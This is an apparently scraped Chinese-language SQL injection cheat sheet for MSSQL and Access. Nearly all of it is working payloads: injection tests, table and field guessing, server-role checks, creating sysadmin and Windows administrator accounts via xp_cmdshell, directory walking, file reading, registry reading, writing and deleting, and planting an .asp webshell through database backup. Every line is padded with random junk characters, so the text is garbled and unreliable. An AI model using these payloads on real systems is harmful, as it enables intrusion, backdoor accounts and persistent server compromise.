1.判断是否有注入;and 1=1 ;and 1=2 l;i/$Yu7
2.初步判断是否是mssql ;and user>0 T(
fcE
v W4n>h}]
3.注入参数是字符'and [查询条件] and ''=' AL;4-(KH
`T3B
4.搜索时没过滤参数的'and [查询条件] and '%25'=' #*X\pjZ
Eo>EK>
5.判断数据库系统 bW^C30m
{Bz E
;and (select count(*) from sysobjects)>0 mssql wEC,Mbn
b)@rp
;and (select count(*) from msysobjects)>0 access uF+0nv+
vKBijmE
3<HZ)w^B
4d\V=_);r
6.猜数据库 ;and (select Count(*) from [数据库名])>0 `k`P;(:
Y&-%
N
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 Uj)Wbe[)p0
n&3}F?
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 GQ2/3kt
ym_p49
9.(1)猜字段的ascii值(access) nt8&Mf
w|c200Is}e
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 9qUkw&}H
mM.YZUX
(2)猜字段的ascii值(mssql) Ug\$Ob5=q
!<?<f
db
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 <.&84c]/&
?!y<%&U
10.测试权限结构(mssql) ;OZl'
. %`
m UUNR,
n x{MUN7
8QMib3p
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- VS@e[,
%~L"TK`?
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- <iB5&
?[7KN8$
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- 1>Q4&1Vn
Bk[C=< X
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- 0+e
e,
fZ>EJ
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- Kr;;aT0P
hLj7i?
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- +QNsI2t;r
r1:CHIwK
;and 1=(select IS_MEMBER('db_owner'));-- j4I ~
rn/~W[
.3&(Y
&f2:aT)
11.添加mssql和系统的帐户 /36gf
%j.n^7i]^:
;exec master.dbo.sp_addlogin username;-- inh
J|pe"
;exec master.dbo.sp_password null,username,password;-- GSW%~9WBa
pQ>|dH+.
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- sou~m,#
O]'2<;
;exec master.dbo.xp_cmdshell 'net user username password EjMVlZC>
-iKoQkHt
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- _s*p$/V\
.><-XJ
;exec master.dbo.xp_cmdshell 'net user username password /add';-- Ft38)T"2R\
:w+vi7l$
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- fUr%@&~l^
w!'y,yb%
%%NT m
`]^W#6l
12.(1)遍历目录 n'0r
(
> l]Ble
;create table dirs(paths varchar(100), id int) Ft?eqDS1
RLZfXXMn
;insert dirs exec master.dbo.xp_dirtree 'c:\' |<'6rJ[i>
[>t;P,
;and (select top 1 paths from dirs)>0 U.X`z3q
`][vaLd`Q
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) 4}s'xMT!
YxrMr9>l1
` FOCX;
YgdQC(ib
(2)遍历目录 "blq)qo)
lV$CBS
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- t<ZBp0
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 ==Xy'n9'
Q-rG~O9-
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 Qj|rNeM_
\Y>b#*m(4
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 M\-[C!h,
b3F KDm[
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 R:$E'PSx
C+g}+
~(8f Uob
tDRo)z
13.mssql中的存储过程 d%. |MAE
E- [Eg
xp_regenumvalues 注册表根键, 子键 A*~G[KC3(
n_Qua|R
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 X</Sl>[8
Je,o(:
xp_regread 根键,子键,键值名 y0`;
br\X
]tf`[bINP
;exec xp_regread OGIv".~s4
J/Lf(;C_
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 L]8z6]j*
4\5i}MIS0
xp_regwrite 根键,子键, 值名, 值类型, 值 J]#rh5um
Z,O*p,Gzn
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 FzcXSKHV%
H(gY=
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 I;-Y2*
oyr b.lu/
xp_regdeletevalue 根键,子键,值名 QkC*om'/!
v0VQ4>
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 @&Z^WN,x
: NA(nA
3
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 3UaW+@
qZ'2M.;
qxDMDMN
wN58uV '
14.mssql的backup创建webshell Hy1$Kvub
}Nd1'BVf
use model e4,SR(O>
f;Oh"Yt
create table cmd(str image); "[!b5f3!I
v/9DD% An
insert into cmd(str) values (''); !Ve0 :$
EQ ee5}
backup database model to disk='c:\l.asp'; 1Acs0`3
?'Hd0)yZ
LWm1j:0
1O<6=oH
15.mssql内置函数 g4b#U\D@)/
IdN3Ea]
;and (select @@version)>0 获得Windows的版本号 |Y05 *!\P*
mvK^')
;and user_name()='dbo' 判断当前系统的连接用户是不是sa y: x<`E=
W#~7X
;and (select user_name())>0 爆当前系统的连接用户 a#"orc j
'~Cn+xf4]
;and (select db_name())>0 得到当前连接的数据库 rR :ZTfJs"
tT>LOI_z
%4),P(4N
YI
?P@y
16.简洁的webshell eA86~M?<o
Rx&O}>"E>l
use model DqT<bNR1*;
Y(bB7tR
create table cmd(str image); cz1 + XpU
ij;NM:|Sd
insert into cmd(str) values (''); ^)?Wm,{"w
Yi?bY
backup database model to disk='g:\wwwtest\l.asp';